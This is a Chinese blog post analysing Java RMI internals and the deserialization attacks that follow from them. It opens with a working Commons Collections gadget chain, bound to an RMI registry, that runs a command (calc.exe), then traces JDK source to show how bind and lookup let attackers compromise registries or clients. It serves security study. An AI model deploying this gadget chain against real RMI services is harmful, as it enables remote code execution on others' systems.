暂无图片
暂无图片
暂无图片
暂无图片
暂无图片

RMI学习

8ypass 2021-06-10
217

RMI介绍

Java远程方法调用,即Java RMI(Java Remote Method Invocation)是Java编程语言里,一种用于实现远程过程调用的应用程序编程接口。它使客户机上运行的程序可以调用远程服务器上的对象。远程方法调用特性使Java编程人员能够在网络环境中分布操作。RMI全部的宗旨就是尽可能简化远程接口对象的使用。

接口的两种常见实现方式是:最初使用JRMP(Java Remote Message Protocol,Java远程消息交换协议)实现;此外还可以用与CORBA兼容的方法实现。RMI一般指的是编程接口,也有时候同时包括JRMP和API(应用程序编程接口),而RMI-IIOP则一般指RMI接口接管绝大部分的功能,以支持CORBA的实现。

最初的RMI API设计为通用地支持不同形式的接口实现。后来,CORBA增加了传值(pass by value)功能,以实现RMI接口。然而RMI-IIOP和JRMP实现的接口并不完全一致

RMI由三部分组成

客户端(java.rmi)

服务端(java.rmi.server)

注册中心(java.rmi.register)


一个rmi例子

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;


import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;
import java.rmi.Remote;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import java.util.HashMap;
import java.util.Map;


public class Rmiregister {


public static void main(String[] args) throws Exception{
Transformer[] fakertransformers=new Transformer[]{new ConstantTransformer(new Class[0])};
Transformer[] transformers = new Transformer[] {
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod", new Class[] { String.class,
Class[].class }, new
Object[] { "getRuntime",
new Class[0] }),
new InvokerTransformer("invoke", new Class[] { Object.class,
Object[].class }, new
Object[] { null, new Object[0] }),
new InvokerTransformer("exec", new Class[] { String.class },
new String[] { "cmd.exe /c calc.exe" }),
};
Transformer transformerChain = new ChainedTransformer(fakertransformers);
HashMap h=new HashMap();
LazyMap lazy_map= (LazyMap) LazyMap.decorate(h,transformerChain);


Constructor AnnotationInvocationHandler_constructor_invoke=Class.forName("sun.reflect.annotation.AnnotationInvocationHandler").getDeclaredConstructor(Class.class, Map.class);
AnnotationInvocationHandler_constructor_invoke.setAccessible(true);
InvocationHandler AnnotationInvocationHandler_constructor_in= (InvocationHandler) AnnotationInvocationHandler_constructor_invoke.newInstance(Override.class,lazy_map);
Field f=transformerChain.getClass().getDeclaredField("iTransformers");
f.setAccessible(true);
f.set(transformerChain,transformers);
Map proxy= (Map) Proxy.newProxyInstance(ClassLoader.getSystemClassLoader(),new Class[]{Map.class},AnnotationInvocationHandler_constructor_in);






Constructor AnnotationInvocationHandler_constructor=Class.forName("sun.reflect.annotation.AnnotationInvocationHandler").getDeclaredConstructor(Class.class, Map.class);
AnnotationInvocationHandler_constructor.setAccessible(true);
InvocationHandler AnnotationInvocationHandler_constructor_payload = (InvocationHandler) AnnotationInvocationHandler_constructor.newInstance(Override.class,proxy);
Remote remote=Remote.class.cast(Proxy.newProxyInstance(rmiserial.class.getClassLoader(),new Class[]{Remote.class},AnnotationInvocationHandler_constructor_payload));


try {
Registry registry = LocateRegistry.createRegistry(4096);
registry.bind("demo",remote);


}catch (Exception e){
System.out.println(e);
}
while(true);


}
}


这里在createRegistry打断点 分析执行流程


    public static Registry createRegistry(int port) throws RemoteException {
return new RegistryImpl(port);
}

跟入RegistryImpl

    public RegistryImpl(int var1) throws RemoteException {
        LiveRef var2 = new LiveRef(id, var1); //var1是端口号 封装c横liveref对象
        this.setup(new UnicastServerRef(var2)); 
}

跟入setup

    private void setup(UnicastServerRef var1) throws RemoteException {
this.ref = var1;
var1.exportObject(this, (Object)null, true); //这里第一个参数是RegistryImpl本身
}


exportObject

 public Remote exportObject(Remote var1, Object var2, boolean var3) throws RemoteException {
Class var4 = var1.getClass(); //RegistryImpl


Remote var5;
try {
            var5 = Util.createProxy(var4, this.getClientRef(), this.forceStubUse); //跟入
} catch (IllegalArgumentException var7) {
throw new ExportException("remote object implements illegal remote interface", var7);
}


if (var5 instanceof RemoteStub) {
this.setSkeleton(var1);
}


Target var6 = new Target(var1, this, var5, this.ref.getObjID(), var3);
this.ref.exportObject(var6);
this.hashToMethod_Map = (Map)hashToMethod_Maps.get(var4);
return var5;
}

createProxy

public static Remote createProxy(Class var0, RemoteRef var1, boolean var2) throws StubNotFoundException {
Class var3;
try {
var3 = getRemoteClass(var0);
} catch (ClassNotFoundException var9) {
throw new StubNotFoundException("object does not implement a remote interface: " + var0.getName());
}


if (var2 || !ignoreStubClasses && stubClassExists(var3)) {
return createStub(var3, var1); //跟入
} else {
ClassLoader var4 = var0.getClassLoader();
Class[] var5 = getRemoteInterfaces(var0);
RemoteObjectInvocationHandler var6 = new RemoteObjectInvocationHandler(var1);


try {
return (Remote)Proxy.newProxyInstance(var4, var5, var6);
} catch (IllegalArgumentException var8) {
throw new StubNotFoundException("unable to create proxy", var8);
}
}
}


跟入createStub

private static RemoteStub createStub(Class var0, RemoteRef var1) throws StubNotFoundException {
        String var2 = var0.getName() + "_Stub"//这里是RegistryImpl_Stub


try {
Class var3 = Class.forName(var2, false, var0.getClassLoader());
Constructor var4 = var3.getConstructor(stubConsParamTypes);
return (RemoteStub)var4.newInstance(var1);
} catch (ClassNotFoundException var5) {
throw new StubNotFoundException("Stub class not found: " + var2, var5);
} catch (NoSuchMethodException var6) {
throw new StubNotFoundException("Stub class missing constructor: " + var2, var6);
} catch (InstantiationException var7) {
throw new StubNotFoundException("Can't create instance of stub class: " + var2, var7);
} catch (IllegalAccessException var8) {
throw new StubNotFoundException("Stub class constructor not public: " + var2, var8);
} catch (InvocationTargetException var9) {
throw new StubNotFoundException("Exception creating instance of stub class: " + var2, var9);
} catch (ClassCastException var10) {
throw new StubNotFoundException("Stub class not instance of RemoteStub: " + var2, var10);
}
}

createStub的作用就是反射创建,然后返回RegistryImpl_Stub方法,所以上面var5就是一个RegistryImpl_Stub的实例


继续跟入exportObject的后半段

        if (var5 instanceof RemoteStub) {
this.setSkeleton(var1);
}


Target var6 = new Target(var1, this, var5, this.ref.getObjID(), var3);
this.ref.exportObject(var6);
this.hashToMethod_Map = (Map)hashToMethod_Maps.get(var4);
return var5;
}


跟入this.ref.exportObject(var6);

public void exportObject(Target var1) throws RemoteException {
synchronized(this) {
this.listen();
++this.exportCount;
}


boolean var2 = false;
boolean var12 = false;


try {
var12 = true;
super.exportObject(var1);
var2 = true;
var12 = false;
} finally {
if (var12) {
if (!var2) {
synchronized(this) {
this.decrementExportCount();
}
}


}
}


if (!var2) {
synchronized(this) {
this.decrementExportCount();
}
}


}


listen

private void listen() throws RemoteException {
assert Thread.holdsLock(this);


TCPEndpoint var1 = this.getEndpoint();
int var2 = var1.getPort();
if (this.server == null) {
if (tcpLog.isLoggable(Log.BRIEF)) {
tcpLog.log(Log.BRIEF, "(port " + var2 + ") create server socket");
}


try {
this.server = var1.newServerSocket();
Thread var3 = (Thread)AccessController.doPrivileged(new NewThreadAction(new TCPTransport.AcceptLoop(this.server), "TCP Accept-" + var2, true));
var3.start();
} catch (BindException var4) {
throw new ExportException("Port already in use: " + var2, var4);
} catch (IOException var5) {
throw new ExportException("Listen failed on port: " + var2, var5);
}
} else {
SecurityManager var6 = System.getSecurityManager();
if (var6 != null) {
var6.checkListen(var2);
}
}


}

listen主要做的就是开始监听

总结

createRegistry主要做了返回了一个RegistryImpl_Stub对象,并且跟入传入的端口开始socket监听

            Registry registry = LocateRegistry.createRegistry(4096);
registry.bind("demo",remote);


在Registryimpl_stub的bind,看对象如何绑定

    public void bind(String var1, Remote var2) throws AccessException, AlreadyBoundException, RemoteException {
try {
RemoteCall var3 = super.ref.newCall(this, operations, 0, 4905912898345647071L);


try {
ObjectOutput var4 = var3.getOutputStream();
var4.writeObject(var1);
var4.writeObject(var2);
} catch (IOException var5) {
throw new MarshalException("error marshalling arguments", var5);
}


super.ref.invoke(var3);
super.ref.done(var3);
} catch (RuntimeException var6) {
throw var6;
} catch (RemoteException var7) {
throw var7;
} catch (AlreadyBoundException var8) {
throw var8;
} catch (Exception var9) {
throw new UnexpectedException("undeclared checked exception", var9);
}
}

其中var1为对象名称,var2才是对象本体,可以看到这把把对象序列化了。

这里ref是UnicastServerRef,调用的是UnicastServerRef父类的newcall


跟入这个newcall

 public RemoteCall newCall(RemoteObject var1, Operation[] var2, int var3, long var4) throws RemoteException {
clientRefLog.log(Log.BRIEF, "get connection");
Connection var6 = this.ref.getChannel().newConnection(); //获取l连接


try {
clientRefLog.log(Log.VERBOSE, "create call context");
if (clientCallLog.isLoggable(Log.VERBOSE)) {
this.logClientCall(var1, var2[var3]);
}


StreamRemoteCall var7 = new StreamRemoteCall(var6, this.ref.getObjID(), var3, var4);


try {
this.marshalCustomCallData(var7.getOutputStream());
} catch (IOException var9) {
throw new MarshalException("error marshaling custom call data");
}


return var7;
} catch (RemoteException var10) {
this.ref.getChannel().free(var6, false);
throw var10;
}
}


var1是RegistryImpl_stub对象

var2忘了

var3是0

这里最终返回的是StreamRemoteCall对象 跟入


StreamRemoteCall

    public StreamRemoteCall(Connection var1, ObjID var2, int var3, long var4) throws RemoteException {
try {
this.conn = var1;
Transport.transportLog.log(Log.VERBOSE, "write remote call header...");
this.conn.getOutputStream().write(80);
this.getOutputStream();
var2.write(this.out);
            this.out.writeInt(var3); //写入0
            this.out.writeLong(var4); //写入了hash
} catch (IOException var7) {
throw new MarshalException("Error marshaling call header", var7);
}
}

注意这个getOutputstream

    private ObjectOutput getOutputStream(boolean var1) throws IOException {
if (this.out == null) {
Transport.transportLog.log(Log.VERBOSE, "getting output stream");
this.out = new ConnectionOutputStream(this.conn, var1);
}


return this.out;
}

最终返回的是StreamRemoteCall对象

public void bind(String var1, Remote var2) throws AccessException, AlreadyBoundException, RemoteException {
try {
//StreamRemoteCall
RemoteCall var3 = super.ref.newCall(this, operations, 0, 4905912898345647071L);


try {
                ObjectOutput var4 = var3.getOutputStream(); //这里返回out
var4.writeObject(var1); //写入bind的名字
                var4.writeObject(var2); //写入bind对应名字的对象
} catch (IOException var5) {
throw new MarshalException("error marshalling arguments", var5);
}


super.ref.invoke(var3);
super.ref.done(var3);
} catch (RuntimeException var6) {
throw var6;
} catch (RemoteException var7) {
throw var7;
} catch (AlreadyBoundException var8) {
throw var8;
} catch (Exception var9) {
throw new UnexpectedException("undeclared checked exception", var9);
}
}

跟入上图的invoke

Unicastref


public void invoke(RemoteCall var1) throws Exception {
try {
clientRefLog.log(Log.VERBOSE, "execute call");
            var1.executeCall(); //这里调用的是streamremotecall的executecall
} catch (RemoteException var3) {
clientRefLog.log(Log.BRIEF, "exception: ", var3);
this.free(var1, false);
throw var3;
} catch (Error var4) {
clientRefLog.log(Log.BRIEF, "error: ", var4);
this.free(var1, false);
throw var4;
} catch (RuntimeException var5) {
clientRefLog.log(Log.BRIEF, "exception: ", var5);
this.free(var1, false);
throw var5;
} catch (Exception var6) {
clientRefLog.log(Log.BRIEF, "exception: ", var6);
this.free(var1, true);
throw var6;
}
}


跟入executeCall

public void executeCall() throws Exception {
DGCAckHandler var2 = null;


byte var1;
try {
if (this.out != null) {
var2 = this.out.getDGCAckHandler();
}


this.releaseOutputStream();
DataInputStream var3 = new DataInputStream(this.conn.getInputStream());
byte var4 = var3.readByte();
if (var4 != 81) {
if (Transport.transportLog.isLoggable(Log.BRIEF)) {
Transport.transportLog.log(Log.BRIEF, "transport return code invalid: " + var4);
}


throw new UnmarshalException("Transport return code invalid");
}


this.getInputStream();
var1 = this.in.readByte();
this.in.readID();
} catch (UnmarshalException var11) {
throw var11;
} catch (IOException var12) {
throw new UnmarshalException("Error unmarshaling return header", var12);
} finally {
if (var2 != null) {
var2.release();
}


}


switch(var1) {
case 1:
return;
case 2:
Object var14;
try {
var14 = this.in.readObject();
} catch (Exception var10) {
throw new UnmarshalException("Error unmarshaling return", var10);
}


if (!(var14 instanceof Exception)) {
throw new UnmarshalException("Return type not Exception");
} else {
this.exceptionReceivedFromServer((Exception)var14);
}
default:
if (Transport.transportLog.isLoggable(Log.BRIEF)) {
Transport.transportLog.log(Log.BRIEF, "return code invalid: " + var1);
}


throw new UnmarshalException("Return code invalid");
}
}

总结:反射创建registryimpl_stub,调用里面的bind方法,把对象序列化后写入,通过executeCall进行请求分发。通过tcp发送消息到服务器。服务器端上面提到有一个监听,在 TCP 协议层发起 socket 监听,并采用多线程循环接收请求:TCPTransport.AcceptLoop(this.server),线程池来处理socket接收到的请求。通过一系列操作获取target对象,这个target对象已经是服务器对象。借由派发器Dispatcher,传入参数服务实现和请求对象remotecall,将请求派发给服务端那个真正提供服务的RegistryImpl 的 lookUp()方法。



lookup分析

public Remote lookup(String var1) throws AccessException, NotBoundException, RemoteException {
try {
          //这里var2同样是Streamremotecall对象
RemoteCall var2 = super.ref.newCall(this, operations, 2, 4905912898345647071L);


try {
ObjectOutput var3 = var2.getOutputStream();
var3.writeObject(var1);
} catch (IOException var18) {
throw new MarshalException("error marshalling arguments", var18);
}


            super.ref.invoke(var2); //调用executecall


Remote var23;
try {
                ObjectInput var6 = var2.getInputStream(); //获取registr的输入流
var23 = (Remote)var6.readObject(); //反序列化
} catch (IOException var15) {
throw new UnmarshalException("error unmarshalling return", var15);
} catch (ClassNotFoundException var16) {
throw new UnmarshalException("error unmarshalling return", var16);
} finally {
super.ref.done(var2);
}


return var23;
} catch (RuntimeException var19) {
throw var19;
} catch (RemoteException var20) {
throw var20;
} catch (NotBoundException var21) {
throw var21;
} catch (Exception var22) {
throw new UnexpectedException("undeclared checked exception", var22);
}
}


可以看到这里可以lookup获取registry的输入流后readObject,说明这里可以通过注册中心打客户端


为什么服务端bind能打注册中心

参考一些文章,得知在exportObject的时候会给this.skel赋值一个registryimpl_skel对象

    public Remote exportObject(Remote var1, Object var2, boolean var3) throws RemoteException {
Class var4 = var1.getClass();


Remote var5;
try {
var5 = Util.createProxy(var4, this.getClientRef(), this.forceStubUse);
} catch (IllegalArgumentException var7) {
throw new ExportException("remote object implements illegal remote interface", var7);
}


if (var5 instanceof RemoteStub) {
this.setSkeleton(var1); //这里
}


public void setSkeleton(Remote var1) throws RemoteException {
if (!withoutSkeletons.containsKey(var1.getClass())) {
try {
this.skel = Util.createSkeleton(var1);
} catch (SkeletonNotFoundException var3) {
withoutSkeletons.put(var1.getClass(), (Object)null);
}
}


}


registryimpl_skel对象的dispatch

public void dispatch(Remote var1, RemoteCall var2, int var3, long var4) throws Exception {
if (var4 != 4905912898345647071L) {
throw new SkeletonMismatchException("interface hash mismatch");
} else {
RegistryImpl var6 = (RegistryImpl)var1;
String var7;
Remote var8;
ObjectInput var10;
ObjectInput var11;
switch(var3) {
case 0:
try {
var11 = var2.getInputStream();
var7 = (String)var11.readObject();
var8 = (Remote)var11.readObject();
} catch (IOException var94) {
throw new UnmarshalException("error unmarshalling arguments", var94);
} catch (ClassNotFoundException var95) {
throw new UnmarshalException("error unmarshalling arguments", var95);
} finally {
var2.releaseInputStream();
}


var6.bind(var7, var8);

这里的var3是在registryimpl_stub中的bind设置

 public void bind(String var1, Remote var2) throws AccessException, AlreadyBoundException, RemoteException {
try {
RemoteCall var3 = super.ref.newCall(this, operations, 0, 4905912898345647071L);


try {

可以看到设置为0

所以上面case 0的时候,会对rmi服务端bind的时候发送过来的序列化数据进行反序列化,这里就导致服务端打注册中心


客户端打注册中心


看到lookup

 public Remote lookup(String var1) throws AccessException, NotBoundException, RemoteException {
try {
RemoteCall var2 = super.ref.newCall(this, operations, 2, 4905912898345647071L);


try {
ObjectOutput var3 = var2.getOutputStream();
                var3.writeObject(var1); //这里对lookup传过来的string进行序列化了
} catch (IOException var18) {
throw new MarshalException("error marshalling arguments", var18);
}


super.ref.invoke(var2);


这里设置为2,对应case 里面的2分支

 public void dispatch(Remote var1, RemoteCall var2, int var3, long var4) throws Exception {
if (var4 != 4905912898345647071L) {
throw new SkeletonMismatchException("interface hash mismatch");
} else {
RegistryImpl var6 = (RegistryImpl)var1;
String var7;
Remote var8;
ObjectInput var10;
ObjectInput var11;
switch(var3) {
case 0:
try {
var11 = var2.getInputStream();
var7 = (String)var11.readObject();
var8 = (Remote)var11.readObject();
} catch (IOException var94) {
throw new UnmarshalException("error unmarshalling arguments", var94);
} catch (ClassNotFoundException var95) {
throw new UnmarshalException("error unmarshalling arguments", var95);
} finally {
var2.releaseInputStream();
}


var6.bind(var7, var8);


try {
var2.getResultStream(true);
break;
} catch (IOException var93) {
throw new MarshalException("error marshalling return", var93);
}
case 1:
var2.releaseInputStream();
String[] var97 = var6.list();


try {
ObjectOutput var98 = var2.getResultStream(true);
var98.writeObject(var97);
break;
} catch (IOException var92) {
throw new MarshalException("error marshalling return", var92);
}
case 2:
try {
var10 = var2.getInputStream();
var7 = (String)var10.readObject(); //对string进行反序列化
} catch (IOException var89) {
throw new UnmarshalException("error unmarshalling arguments", var89);
} catch (ClassNotFoundException var90) {
throw new UnmarshalException("error unmarshalling arguments", var90);
} finally {
var2.releaseInputStream();
}


var8 = var6.lookup(var7);


try {
ObjectOutput var9 = var2.getResultStream(true);
var9.writeObject(var8);
break;
} catch (IOException var88) {
throw new MarshalException("error marshalling return", var88);
}

用一下threedr3am师傅原图


参考链接

https://xz.aliyun.com/t/7079

https://xz.aliyun.com/t/7264

https://paper.seebug.org/1420/


文章转载自8ypass,如果涉嫌侵权,请发送邮件至:contact@modb.pro进行举报,并提供相关证据,一经查实,墨天轮将立刻删除相关内容。

评论